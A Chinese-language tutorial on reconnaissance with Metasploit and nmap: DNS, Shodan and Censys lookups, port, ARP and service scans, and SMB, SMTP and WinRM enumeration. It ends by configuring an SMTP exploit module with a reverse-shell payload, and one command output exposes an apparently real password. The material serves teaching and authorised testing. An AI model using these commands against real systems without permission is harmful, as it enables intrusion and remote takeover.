Metasploit技术-01-信息收集
参考链接:
第八章(二)—漏洞扫描(nmap脚本使用)–作者:婉哥
nmap脚本(nse)使用总结–作者 whatday
Metasploit快速入门(二)–公众号:合天智汇
MS渗透的大致步骤如下:
- 扫描目标机系统,寻找可用漏洞
- 选择配置一个漏洞利用模块
- 选择并配置一个攻击载荷模块
- 选择一个编码技术,用来绕过杀毒软件的查杀
- 渗透攻击
文章目录
- 1.主机扫描
- 1.1、被动信息收集
- 1.1.1、DNS扫描
- 1.1.2、公司信息收集
- 1.1.3、搜索引擎子域名搜集器
- 1.1.4、Censys搜索模块
- 1.1.5、Shodan搜索和蜜罐检测
- 1.2、主动信息收集
- 1.2.1、端口扫描-TCP扫描
- TCP端口扫描
- TCP SYN扫描
- 1.2.2、Nmap:端口扫描
- 1.2.3、基于ARP的主机发现
- 1.2.4、UDP服务识别
- 1.2.5、SMB扫描和枚举
- 1.2.6、SSH版本扫描和检测
- 1.2.7、FTP扫描
- 1.2.8、SMTP枚举
- 1.2.9、SNMP枚举
- 1.2.10、HTTP扫描
- 1.2.11、WinRM扫描和爆破
- 1.3、脚本引擎-Nmap
- nmap应用扩展:
- 1.4、漏洞利用-举例smtp
1.主机扫描
目的:
目标机器的IP、可用服务、开放端口等等
1.1、被动信息收集
模块显示:
search + XXX
gather模块
search gather
1.1.1、DNS扫描
DNS扫描和枚举模块,可用于从给定的DNS服务器收集有关域名的信息,执行各种DNS查询(如域传送、反向查询、SRV记录等)
1、进入模块:use auxiliary/gather/enum_dns
查看模块信息:info
2、设置查询域名、线程数量,然后运行它。
set DOMAIN rongjiu168.com //设置查询域名
set THREADS 5 //设置线程数量
run //运行它
通过输出信息查看DNS记录。
更多:
1.1.2、公司信息收集
1.1.3、搜索引擎子域名搜集器
从Yahoo和Bing收集域名的子域信息。
调用此模块:
use auxiliary/gather/searchengine_subdomains_collector
(可能是由于Q或者其他原因吧,导致搜不出来。)
1.1.4、Censys搜索模块
Censys搜索引擎,与最流行的搜索引擎Shodan非常类似。Censys是一款免费的搜索引擎,密歇根大学的研究者开发的检索引擎,用的是自己开发的Scan工具:zmap。速度比Nmap快N倍,传说4分钟可以扫全IPv4。但是api使用还是有次数限制。
use auxiliary/gather/censys_search //调用模块
set CENSYS_DORK packtpub.com //设置目标站点
set CENSYS_SEARCHTYPE ipv4 //设置搜索类型
PS://还需要设置censys密钥和API_ID,但是这两个需要在 https://censys.io/register 注册获取API和密钥
1.1.5、Shodan搜索和蜜罐检测
shodan搜索引擎
与谷歌不同的是,Shodan不是在网上搜索网址,而是直接进入互联网的背后通道。Shodan可以说是一款“黑暗”谷歌,一刻不停的在寻找着所有和互联网关联的服务器、摄像头、打印机、路由器等等。每个月Shodan都会在大约5亿个服务器上日夜不停地搜集信息。
PS:需要使用此模块也需要去shodan官网 https://account.shodan.io/login 注册过去API key。
调用模块:
use auxiliary/gather/shodan_search
如下,可以根据参数设置对应信息,获取搜索结果。
shodan蜜罐检测:
检测目标是否为蜜罐,避免浪费时间或因为试图攻击蜜罐而被封锁。使用 Shodan Honeyscore Client 模块,可
以利用 Shodan 搜索引擎检测目标是否为蜜罐。结果返回为 0 到 1 的评级分数,如果是 1 ,则是一个蜜罐。
调用模块:
use auxiliary/gather/shodan_honeyscore
如下,可以根据参数设置对应信息,获取检测结果。
1.2、主动信息收集
查看可用的端口模块:
search portscan
1.2.1、端口扫描-TCP扫描
从上面可以看见有许多的扫描类型,在此我们以TCP扫描为例:
TCP端口扫描
调用模块:
use auxiliary/scanner/portscan/tcp
利用 show options
查看所有的配置选项。用 show missing
查看必须要配置的选项。
接下来,我们来分析一下上面的的参数:
set命令设置参数,unser命令取消某个参数。
在Required列中,被标记为yes的参数必须包含实际的值,如没有设置的话,将调用默认值(即在current setting中的值)。
RHOSTS:设置待扫描的IP地址
PORTS:设置扫描的端口范围
THREADS:设置扫描线程,线程越高,数量越快。
TCP SYN扫描
相对普通的TCP扫描来说,SYN扫描速度比较快,因为他不会完成TCP三次握手,而且可以在一定程度上躲避防火墙和入侵检测系统的检测。
调用模块;
use auxiliary/scanner/portscan/syn
1.2.2、Nmap:端口扫描
进入nmap:
msf5> nmap
1.TCP扫描:参数为 -sT, nmap -sT 192.168.1.XXX
2.TCP SYN扫描:参数为-sS, nmap -sS 192.168.1.XXX
3.UDP扫描:参数为 -sU, nmap -sU 192.168.1.XXX
4系统.扫描端口,及端口相关服务与版本号,参数为 -sV, nmap -sV 192.168.1.xxx
5.操作系统和版本检测,参数- O,nmap -O 192.168.1.XXX
6.隐蔽扫描
默认情况下,防火墙和IDS日志会记录你的IP,nmap中提供了-D选项来增加迷惑性。
他是通过添加其他的IP地址,让目标以为是多个IP在攻击,并不能阻止防火墙和IDSji记录你的IP。
msf5> nmap -sT 192.168.1.177 -D 192.168.1.1,192.168.1.2
1.2.3、基于ARP的主机发现
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。
主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;
收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。
ARP欺骗:
地址解析协议ARP是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;
由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。
通过ARP可以枚举本地网络中的存活主机,提供一个简单而快速的识别目标的方法。
如下,我们可以通过arp -a指令查看一下我们自己计算机的ARP缓存表:
当我们的攻击者与目标机器处于同一个局域网时,可以通过执行 ARP 扫描发现主机。
1.使用ARP 扫描模块( auxiliary/scanner/discovery/arp_sweep
)
use auxiliary/scanner/discovery/arp_sweep
通过 show options
查看需要的范围。
设置目标地址范围和并发线程,然后运行。
sf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24 //设置主机IP范围
RHOSTS => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100 //设置线程数
THREADS => 100
msf5 auxiliary(scanner/discovery/arp_sweep) > run //运行
如果连接了数据库的话,可以输入 hosts
查看存在的机器如下所示:
1.2.4、UDP服务识别
使用UDP服务扫描模块检测系统的UDP服务,由于UDP是一个无连接的协议(不面向连接),因此探测比TCP困难。
调用模块:
use auxiliary/scanner/discovery/udp_sweep
set设置模块目标范围,然后run运行扫描。扫描结果如下:
1.2.5、SMB扫描和枚举
Samba是Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网的不同计算机之间提供文件及打印机等资源的共享服务。
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。已被证明是最容易被攻击的协议之一,它允许攻击枚举目标文件和用户,甚至是远程代码执行。
在这我们使用无需身份验证的共享枚举模块,帮助我们收集一些有价值的东西。
调用模块:
use auxiliary/scanner/smb/smb_enumshares
设置必要的相关参数:
msf5 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.177
RHOSTS => 192.168.1.177
msf5 auxiliary(scanner/smb/smb_enumshares) > set SMBPASS vagrant
SMBPASS => vagrant
msf5 auxiliary(scanner/smb/smb_enumshares) > set SMBUser vagrant
SMBUser => vagrant
msf5 auxiliary(scanner/smb/smb_enumshares) > set ShowFiles true
ShowFiles => true
msf5 auxiliary(scanner/smb/smb_enumshares) > sett SpiderShares
^CInterrupt: use the 'exit' command to quit
msf5 auxiliary(scanner/smb/smb_enumshares) > set SpiderShares
SpiderShares => false
msf5 auxiliary(scanner/smb/smb_enumshares) > show options
检查我们设置的参数是否有问题,没问题的话输入 run
运行结果。
1.2.6、SSH版本扫描和检测
SSH,为 Secure Shell 的缩写,SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。
1、调用SSH版本探测模块来获取目标系统上运行的SSH版本信息。
use auxiliary/scanner/ssh/ssh_version
这里的RHOSTS选项也可以指定为网络地址,从而扫描整个网段。
获取版本信息之后,我们就可以搜索该版本的漏洞信息。
2、如下,为使用ssh登录测试模块测试常用口令登录ssh
3、如果登录成功,可以用sessions车看回话与目标进行会话交互。
1.2.7、FTP扫描
同理,可以使用模块来检测正在运行的ftp的版本。
调用模块:
use auxiliary/scanner/ftp/ftp_version
我们可以使用services命令查看已检测的服务信息。
1.2.8、SMTP枚举
SMTP是一种提供可靠且有效的电子邮件传输的协议。SMTP是建立在FTP文件传输服务上的一种邮件服务,主要用于系统之间的邮件信息传递,并提供有关来信的通知。
使用SMTP,可实现相同网络处理进程之间的邮件传输,也可通过中继器或网关实现某处理进程与其他网络之间的邮件传输。
SMTP服务,服务于两个允许枚举用户的内部命令:
- VRFY(确认有效用户名)
- EXPN(显示用户的实际地址,别名和邮件列表)
默认情况下,SMTP枚举模块使用 unix_users.txt
文件(/usr/share/metasploit-framework/data/wordlists/unix_users.txt
)作为字典,也可以自己指定字典文件。
调用模块。
use auxiliary/scanner/smtp/smtp_enum
设置好目标IP和线程没然后run开始
1.2.9、SNMP枚举
简单网络管理协议(SNMP) 是专门设计用于在 IP 网络管理网络节点(服务器、工作站、路由器、交换机及HUBS等)的一种标准协议,它是一种应用层协议。
调用模块:
use auxiliary/scanner/snmp/snmp_enum
设置好目标IP和线程没然后run开始。
1.2.10、HTTP扫描
HTTP协议,全称为HyperText Transfer Protocol,中文名为超文本传输协议,是互联网中最常用的一种网络协议。HTTP的重要应用之一是WWW服务。设计HTTP协议最初的目的就是提供一种发布和接受HTML(一种页面标记语言)页面的方法。
1.检测目标机器的HTTP SSL证书。
msf5 auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/http/cert //调用模块
msf5 auxiliary(scanner/http/cert) > set RHOSTS 111.75.188.59 //设置目标IP
RHOSTS => 111.75.188.59
msf5 auxiliary(scanner/http/cert) > set PORT 8080 //设置端口
PORT => 8080
msf5 auxiliary(scanner/http/cert) > run
2.检测robots.txt 文件
msf5 auxiliary(scanner/http/cert) > use auxiliary/scanner/http/robots_txt
msf5 auxiliary(scanner/http/robots_txt) > use auxiliary/scanner/http/cert
msf5 auxiliary(scanner/http/cert) > set RHOSTS 192.168.1.177
RHOSTS => 192.168.1.177
msf5 auxiliary(scanner/http/cert) > set PORT 10000
PORT => 10000
msf5 auxiliary(scanner/http/cert) > run
3.HTTP可写路径 PUT/DELETE 文件访问模块可以通过 PUT 和DELETE 请求上传和删除Web服务器上的内容。
1.2.11、WinRM扫描和爆破
WinRM是Windows本地的内置远程管理协议,其最简单的形式是使用“简单对象访问协议”与远程计算机和服务器以及操作系统和应用程序接口。
1、windows身份认证检测
msf5 auxiliary(scanner/http/http_put) > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 192.168.1.177
RHOSTS => 192.168.1.177
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run
2、使用winRM命令运行模块
msf5 auxiliary(scanner/winrm/winrm_cmd) > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD hostname
CMD => hostname
msf5 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.XXX.XXX
RHOSTS => 192.168.31.234
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD XXXXXX
PASSWORD => hhazj1234
msf5 auxiliary(scanner/winrm/winrm_cmd) > run
1.3、脚本引擎-Nmap
map扫描脚本,它可以将nmap转为漏洞扫描器使用,NSE默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。
/usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放
cat script.db
less script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本
如下,后面的脚本的大致分类:
auth: 负责处理鉴权证书(绕开鉴权)的脚本
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式,针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源,例如进行whois解析
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反,属于安全性脚本
version: 负责增强服务与版本扫描(Version Detection)功能的脚本
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
我们也可以用 cat script.db
进行分类查看。如下
我们可以在/usr/share/nmap/scripts/
目录中找到这些脚本,或者如下,用 locate *.nse
来找到。
大致用法为:nmap --script <scriptname> <hostip>
如果想要使用这个分类下的所有脚本,可以在–script的后面加上分类名称,同样我们可以用相似的方法来提高目标版本的检测功能,以及将目标端口设置为全部有效端口。
nmap -p- -sV --version-all --script discovery 192.168.1.177
nmap应用扩展:
来自于链接:http://blog.sina.com.cn/s/blog_b02937e80102wg23.html
进行ping扫描,打印出对扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测):
nmap -sP 192.168.1.0/24
仅列出指定网络上的每台主机,不发送任何报文到目标主机:
nmap -sL 192.168.1.0/24
探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80):
nmap -PS 192.168.1.234
使用UDP ping探测主机:
nmap -PU 192.168.1.0/24
使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快:
nmap -sS 192.168.1.0/24
当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描:
nmap -sT 192.168.1.0/24
UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口:
nmap -sU 192.168.1.0/24
确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等):
nmap -sO 192.168.1.19
探测目标主机的操作系统:
nmap -O 192.168.1.19
nmap -A 192.168.1.19
1.4、漏洞利用-举例smtp
从上面扫描的主机,我们可以发现上面含有smtp协议,因此我们可以 search smtp
搜索smtp的漏洞利用模块,并选择合适的模块,如下图所示。
我们可以查看各个漏洞的rank。从而判断他的利用相对难易度,可以优先使用标记为"excellent"的,即杰出省时间而且是最新的。
use选择我们想要的模块。
use exploit/linux/smtp/harak
show查看可利用的攻击载荷。
show payloads
在这里我们用 set 选择一个我们可能需要载荷吧。
set PAYLOAD generic/shell_reverse_tcp
然后再用 set 对其他参数进行设置。
sf5 exploit(linux/smtp/haraka) > set PAYLOAD generic/shell_reverse_tcp //选择攻击载荷
PAYLOAD => generic/shell_reverse_tcp
msf5 exploit(linux/smtp/haraka) > set RHOST 192.168.1.177 //设置被攻击主机IP
RHOST => 192.168.1.177
msf5 exploit(linux/smtp/haraka) > set RPORT 25 //设置漏洞利用端口号
RPORT => 25
msf5 exploit(linux/smtp/haraka) > set LHOST 192.168.10.130 //设置发动攻击主机IP
LHOST => 192.168.10.130
msf5 exploit(linux/smtp/haraka) > show options //确认攻击参数是否已经设置号
设置完成后,我们可以用 exploit或者run
进行攻击。
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- Flutter Visual Studio Code开发环境搭建
概述 已下内容参考了官网教程。官网如果无法访问试一下科学上网。 开发环境搭建 安装 VS Code VS Code 最新稳定版本。 安装插件-Flutter and Dart打开 VS Code 打开命令面板 View > Command Palette,快捷键 shift+command+p输入 “install”, 并选择"Install Extensi…...
2024/4/15 10:05:39 - 线程第一次启动和异常的注册(UEF的一个特性)
找一个受害者(这里使用的是win 7 x32的)这些都是之前做的现在出来上班怕到时又忘记了所以记录一下,这里是从r3开始记录的首先需要找到一个进程用来观察它的线程的入口地址是多少,使用命令!process 0 0,如下图最简单的方式就是挂靠到它,使用命令.process /i ,之后按g放行就…...
2024/4/28 0:24:29 - 文件系统和BTRFS简介
Linux文件系统的体系结构是一个对复杂系统进行抽象化的有趣例子。通过使用一组通用的API函数,Linux就可以在多种存储设备上支持多种文件系统,这使得它拥有了与其他操作系统和谐共存的能力。文件系统概述文件是文件系统中最核心的概念,Linux中文件的概念并不局限于普通的磁盘…...
2024/4/28 8:35:09 - 大学中的3大阴暗面, 一般人根本想象不到
在很多人的想象中,大学是一个非常完美的地方。的确,对于大多数学生来说,大学是一个充满了美好回忆场景。 不过,有阳光就会有阴影,再好的大学里,也会有一些肮脏的事情发生。下面我们就来说说大学中那些少见,但的确存在的黑暗面。 (1)保研路 保研路对于很多人来说已经不…...
2024/4/28 4:40:56 - 比特币的走势
眼看币王就要冲击万元大关,这时不知从那个角落里就传来一条消息:美国证券交易委员会(SEC)美国证券交易委员会(SEC)和商品期货交易委员会将举行会议。在这次会议中,讨论的重点是以太币和瑞波币的监管状况。这是一条多么无聊的消息,且不说消息的真假,SEC对数字货币的调查…...
2024/4/28 4:02:11 - Linux,让你的项目跑在Linux上
引言 1.1开发环境平时大家大多是在windows或者Mac操作系统下去编写代码进行开发,在开发环境中安装大量的软件,这样会导致环境的稳定性和安全性降低1.2生产环境是将程序原型在此环境中,供用户去使用.这个环境是有专业的人员去维护,一般是没有权限去操作生产环境的.1.3测试环境一…...
2024/4/8 23:49:59 - 2020最新 腾讯云数据库团队:SQL Server 数据加密功能解析
数据加密是数据库被破解、物理介质被盗、备份被窃取的最后一道防线;数据加密,一方面解决数据被窃取安全问题,另一方面有关法律要求强制加密数据;SQL Server 的数据加密相较于其他数据库,功能相对完善,加密方法较多。通常来讲,数据加密分为对称加密和非对称加密。对称加密…...
2024/4/28 6:24:46 - 融跃小课堂:上海CFA报名条件是什么?
CFA作为一项国际级考试,其证书在全球金融范围可有着极高的含金量,然而有不少考生会担心,由于证书含金量较高,其考试也会比较难。到底CFA考试难不难?融跃下面为你详细讲解! 一、报名条件不难达到 其实,CFA考试并没有大家所想象那样那么难,尤其是在报名条件方面,CFA考试…...
2024/4/8 0:38:03 - 职场黑暗
1月份的时候,参加一个事业单位考试,考试前一天被朋友告知已经内定人选了,明天就是走一个过场,但是因为刚出社会,想着多一场考试也是能够增加一次经验的,抱着群演的心态就去参加笔试和面试了(笔试面试共同进行)。结果很意外的是,过了3天,成绩出来(没有公示,是朋友弄…...
2024/4/16 13:04:55 - 七个关键心理学(3)
本来想自己总结下,发现有篇文章写的也很详细,可以自行观看。 32思维模型:过度自信一行为金融学四大研究成果之一 下面摘自心理学:关于人性的5个真相,你知道的越早越好第3个的描述。 一项心理学调查表明,超过90%的人都相信自己比50%的人都聪明。我们总会认为我们知道的比实…...
2024/4/28 7:17:41 - 查找_折半查找(C语言)
折半查找 1.查找原理折半查找(Binary Search)也称二分查找,是一种效率较高的查找方法,但是折半查找有局限性,它只适用于顺序存储结构的有序表查找过程:从表的中间位置开始,判断与给定的值是否相等,若相等则查找成功,若不相等,根据中间值的大小,将查找范围缩小一半到…...
2024/4/11 7:31:39 - 自己理解的tcp的三次握手和四次挥手
...
2024/4/10 14:10:30 - linux系统文件目录结构说明
/bin :普通用户使用的命令,在C7中迁移至/usr/bin下 /bin/ls /bin/date /sbin :管理员使用的命令,在C7中迁移至/usr/sbin下 /sbin/service /dev :设备文件 /dev/sda /dev/sda1 /dev/zero /dev/null /root :root用户的家目录 /home :普通用户的家目录 /proc :虚拟的文件…...
2024/4/26 14:04:27 - flink之检查点(checkpoint)和保存点(savepoint)的区别
一、检查点:检查点屏障跟普通记录一样。它们由算子处理,但并不参与计算,而是会触发与检查点相关的行为。会在算子之间流动。当读取输入流的数据源遇到检查点屏障时,它将其在输入流中的位置保存到稳定存储中。如果输入流来自消息传输系统(Kafka 或 MapR Streams),这个位置…...
2024/4/26 21:36:23 - 初识jenkins
1.在jenkins官方网站下载https://jenkins.io/zh/关于jenkins的war包或者压缩包。 https://www.yiibai.com/jenkins/jenkins_installation.html 2.安装jdk(oracle官网) 配置环境变量 系统变量→新建JAVA_HOME变量,jdk的路径。 Path变量→编辑%JAVA_HOME%\bin;%JAVA_HOME%\jre…...
2024/4/18 16:37:08 - @Data注解使用后get set报错解决方法
@Data注解使用后get set报错解决方法参考文章: (1)@Data注解使用后get set报错解决方法 (2)https://www.cnblogs.com/lijinshan950823/p/9373408.html 备忘一下。...
2024/4/13 7:05:42 - 类的定义及其调用
phoneuse为主函数类 phone为应用类 应该放在同一个learnone包下下 每一个类前加上前缀 package learnone;phone应用类 public class phone {String brand;String type;float price;public void call() {System.out.println("拨打电话");}public void message() {Syst…...
2024/4/24 16:01:27 - 2020最新 腾讯云服务器安装宝塔面板建网站全过程(图文教程)
腾讯云服务器如何安装宝塔面板?宝塔面板支持LAMP/LNMP/网站/FTP/数据库等可视化功能,服务器安装宝塔面板的用户越来越多,码笔记以腾讯云服务器为例来说说腾讯云服务器安装宝塔面板的教程:腾讯云服务器安装宝塔主机面板首先你得拥有一台腾讯云服务器(腾讯云限时秒杀)码笔记…...
2024/4/11 21:25:34 - Github上这5款非常好用的开源 Docker 工具,京东、华为都在用
前言Docker 社区已经创建了许多开源工具,它们能帮我们处理各种用例。作者在本文中推荐了 5 款认为最有用的 Docker 工具,分别是 Watchtower(自动更新 Docker 容器)、docker-gc(容器和镜像的垃圾回收)、docker-slim(容器瘦身)、 rocker:突破 Dockerfile 的限制,以及 c…...
2024/4/24 5:25:49 - Hyperledger Fabric 2.2实战记录(一)
安装Hyperledger Fabric 2.2后执行以下操作一、搭建基础网络1.生成证书素材cd ~/work/example/organizations/vim crypto-config.yaml OrdererOrgs:- Name: OrdererOrgDomain: example.com #此处是根域名不是orderer.example.comSpecs:- Hostname: ordererPeerOrgs:- Name: Or…...
2024/4/12 18:25:35
最新文章
- MySql 导出导入(备份还原)
1,导出备份 要导出MySQL数据库中的数据,使用mysqldump命令。假设要导出名为mydatabase的数据库到名为backup.sql的文件中: mysqldump -u 用户名 -p 数据库名 > backup.sql 参数说明: -u mysql用户名称 -p 执行后会要求输入…...
2024/4/28 14:35:05 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - 最新在线工具箱网站系统源码
内容目录 一、详细介绍二、效果展示1.部分代码2.效果图展示 三、学习资料下载 一、详细介绍 系统内置高达72种站长工具、开发工具、娱乐工具等功能。此系统支持本地调用API,同时还自带免费API接口, 是一个多功能性工具程序,支持后台管理、上…...
2024/4/27 9:59:44 - 安装Docker(CentOS)
Docker 分为 CE 和 EE 两大版本。CE 即社区版(免费,支持周期 7 个月),EE 即企业版,强调安全,付费使用,支持周期 24 个月。 Docker CE 分为 stable test 和 nightly 三个更新频道。 官方网站上…...
2024/4/22 19:32:03 - 416. 分割等和子集问题(动态规划)
题目 题解 class Solution:def canPartition(self, nums: List[int]) -> bool:# badcaseif not nums:return True# 不能被2整除if sum(nums) % 2 ! 0:return False# 状态定义:dp[i][j]表示当背包容量为j,用前i个物品是否正好可以将背包填满ÿ…...
2024/4/28 4:04:40 - 【Java】ExcelWriter自适应宽度工具类(支持中文)
工具类 import org.apache.poi.ss.usermodel.Cell; import org.apache.poi.ss.usermodel.CellType; import org.apache.poi.ss.usermodel.Row; import org.apache.poi.ss.usermodel.Sheet;/*** Excel工具类** author xiaoming* date 2023/11/17 10:40*/ public class ExcelUti…...
2024/4/28 12:01:04 - Spring cloud负载均衡@LoadBalanced LoadBalancerClient
LoadBalance vs Ribbon 由于Spring cloud2020之后移除了Ribbon,直接使用Spring Cloud LoadBalancer作为客户端负载均衡组件,我们讨论Spring负载均衡以Spring Cloud2020之后版本为主,学习Spring Cloud LoadBalance,暂不讨论Ribbon…...
2024/4/27 12:24:35 - TSINGSEE青犀AI智能分析+视频监控工业园区周界安全防范方案
一、背景需求分析 在工业产业园、化工园或生产制造园区中,周界防范意义重大,对园区的安全起到重要的作用。常规的安防方式是采用人员巡查,人力投入成本大而且效率低。周界一旦被破坏或入侵,会影响园区人员和资产安全,…...
2024/4/27 12:24:46 - VB.net WebBrowser网页元素抓取分析方法
在用WebBrowser编程实现网页操作自动化时,常要分析网页Html,例如网页在加载数据时,常会显示“系统处理中,请稍候..”,我们需要在数据加载完成后才能继续下一步操作,如何抓取这个信息的网页html元素变化&…...
2024/4/28 12:01:03 - 【Objective-C】Objective-C汇总
方法定义 参考:https://www.yiibai.com/objective_c/objective_c_functions.html Objective-C编程语言中方法定义的一般形式如下 - (return_type) method_name:( argumentType1 )argumentName1 joiningArgument2:( argumentType2 )argumentName2 ... joiningArgu…...
2024/4/28 12:01:03 - 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】
👨💻博客主页:花无缺 欢迎 点赞👍 收藏⭐ 留言📝 加关注✅! 本文由 花无缺 原创 收录于专栏 【洛谷算法题】 文章目录 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】🌏题目描述🌏输入格…...
2024/4/28 12:01:03 - 【ES6.0】- 扩展运算符(...)
【ES6.0】- 扩展运算符... 文章目录 【ES6.0】- 扩展运算符...一、概述二、拷贝数组对象三、合并操作四、参数传递五、数组去重六、字符串转字符数组七、NodeList转数组八、解构变量九、打印日志十、总结 一、概述 **扩展运算符(...)**允许一个表达式在期望多个参数࿰…...
2024/4/27 12:44:49 - 摩根看好的前智能硬件头部品牌双11交易数据极度异常!——是模式创新还是饮鸩止渴?
文 | 螳螂观察 作者 | 李燃 双11狂欢已落下帷幕,各大品牌纷纷晒出优异的成绩单,摩根士丹利投资的智能硬件头部品牌凯迪仕也不例外。然而有爆料称,在自媒体平台发布霸榜各大榜单喜讯的凯迪仕智能锁,多个平台数据都表现出极度异常…...
2024/4/27 21:08:20 - Go语言常用命令详解(二)
文章目录 前言常用命令go bug示例参数说明 go doc示例参数说明 go env示例 go fix示例 go fmt示例 go generate示例 总结写在最后 前言 接着上一篇继续介绍Go语言的常用命令 常用命令 以下是一些常用的Go命令,这些命令可以帮助您在Go开发中进行编译、测试、运行和…...
2024/4/28 9:00:42 - 用欧拉路径判断图同构推出reverse合法性:1116T4
http://cplusoj.com/d/senior/p/SS231116D 假设我们要把 a a a 变成 b b b,我们在 a i a_i ai 和 a i 1 a_{i1} ai1 之间连边, b b b 同理,则 a a a 能变成 b b b 的充要条件是两图 A , B A,B A,B 同构。 必要性显然࿰…...
2024/4/27 18:40:35 - 【NGINX--1】基础知识
1、在 Debian/Ubuntu 上安装 NGINX 在 Debian 或 Ubuntu 机器上安装 NGINX 开源版。 更新已配置源的软件包信息,并安装一些有助于配置官方 NGINX 软件包仓库的软件包: apt-get update apt install -y curl gnupg2 ca-certificates lsb-release debian-…...
2024/4/28 4:14:21 - Hive默认分割符、存储格式与数据压缩
目录 1、Hive默认分割符2、Hive存储格式3、Hive数据压缩 1、Hive默认分割符 Hive创建表时指定的行受限(ROW FORMAT)配置标准HQL为: ... ROW FORMAT DELIMITED FIELDS TERMINATED BY \u0001 COLLECTION ITEMS TERMINATED BY , MAP KEYS TERMI…...
2024/4/27 13:52:15 - 【论文阅读】MAG:一种用于航天器遥测数据中有效异常检测的新方法
文章目录 摘要1 引言2 问题描述3 拟议框架4 所提出方法的细节A.数据预处理B.变量相关分析C.MAG模型D.异常分数 5 实验A.数据集和性能指标B.实验设置与平台C.结果和比较 6 结论 摘要 异常检测是保证航天器稳定性的关键。在航天器运行过程中,传感器和控制器产生大量周…...
2024/4/27 13:38:13 - --max-old-space-size=8192报错
vue项目运行时,如果经常运行慢,崩溃停止服务,报如下错误 FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 因为在 Node 中,通过JavaScript使用内存时只能使用部分内存(64位系统&…...
2024/4/28 12:00:58 - 基于深度学习的恶意软件检测
恶意软件是指恶意软件犯罪者用来感染个人计算机或整个组织的网络的软件。 它利用目标系统漏洞,例如可以被劫持的合法软件(例如浏览器或 Web 应用程序插件)中的错误。 恶意软件渗透可能会造成灾难性的后果,包括数据被盗、勒索或网…...
2024/4/28 12:00:58 - JS原型对象prototype
让我简单的为大家介绍一下原型对象prototype吧! 使用原型实现方法共享 1.构造函数通过原型分配的函数是所有对象所 共享的。 2.JavaScript 规定,每一个构造函数都有一个 prototype 属性,指向另一个对象,所以我们也称为原型对象…...
2024/4/27 22:51:49 - C++中只能有一个实例的单例类
C中只能有一个实例的单例类 前面讨论的 President 类很不错,但存在一个缺陷:无法禁止通过实例化多个对象来创建多名总统: President One, Two, Three; 由于复制构造函数是私有的,其中每个对象都是不可复制的,但您的目…...
2024/4/28 7:31:46 - python django 小程序图书借阅源码
开发工具: PyCharm,mysql5.7,微信开发者工具 技术说明: python django html 小程序 功能介绍: 用户端: 登录注册(含授权登录) 首页显示搜索图书,轮播图࿰…...
2024/4/28 8:32:05 - 电子学会C/C++编程等级考试2022年03月(一级)真题解析
C/C++等级考试(1~8级)全部真题・点这里 第1题:双精度浮点数的输入输出 输入一个双精度浮点数,保留8位小数,输出这个浮点数。 时间限制:1000 内存限制:65536输入 只有一行,一个双精度浮点数。输出 一行,保留8位小数的浮点数。样例输入 3.1415926535798932样例输出 3.1…...
